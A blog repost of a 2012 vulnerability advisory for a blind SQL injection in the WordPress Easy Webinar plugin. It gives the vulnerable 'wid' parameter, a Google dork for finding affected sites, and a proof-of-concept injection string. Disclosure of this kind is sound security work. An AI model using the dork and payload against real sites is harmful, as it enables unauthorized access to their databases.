Receive all updates via Facebook. Just Click the Like Button Below

Powered By EXEIdeas

Labels: , ,

Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability

#ExploitTitle:Wordpress Easy
Webinar Plugin Blind SQL Injection
Vulnerability

#VendorHomepage:
www.easywebinarplugin.com

#Date:10/26/2012

#Author:RobertCooper(robert.cooper
[at]areyousecure.net)

#Testedon:[Linux/Windows7]

#Vulnerable Parameters:wid=
Code:
#GoogleDork:allinurl:get-
widget.php?wid=

##############################################################
Exploit:

www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=
[SQLi]

Note:The HTTP response will read 404,
but this is false:

www.example.com/wp-content/plugins/
webinar_plugin/get-widget.php?wid=3'
or'x'='x

This wil lresult in the page loading
correctly and show that the pluginis
vulnerable to injection (string).

##############################################################

No comments:

Post a Comment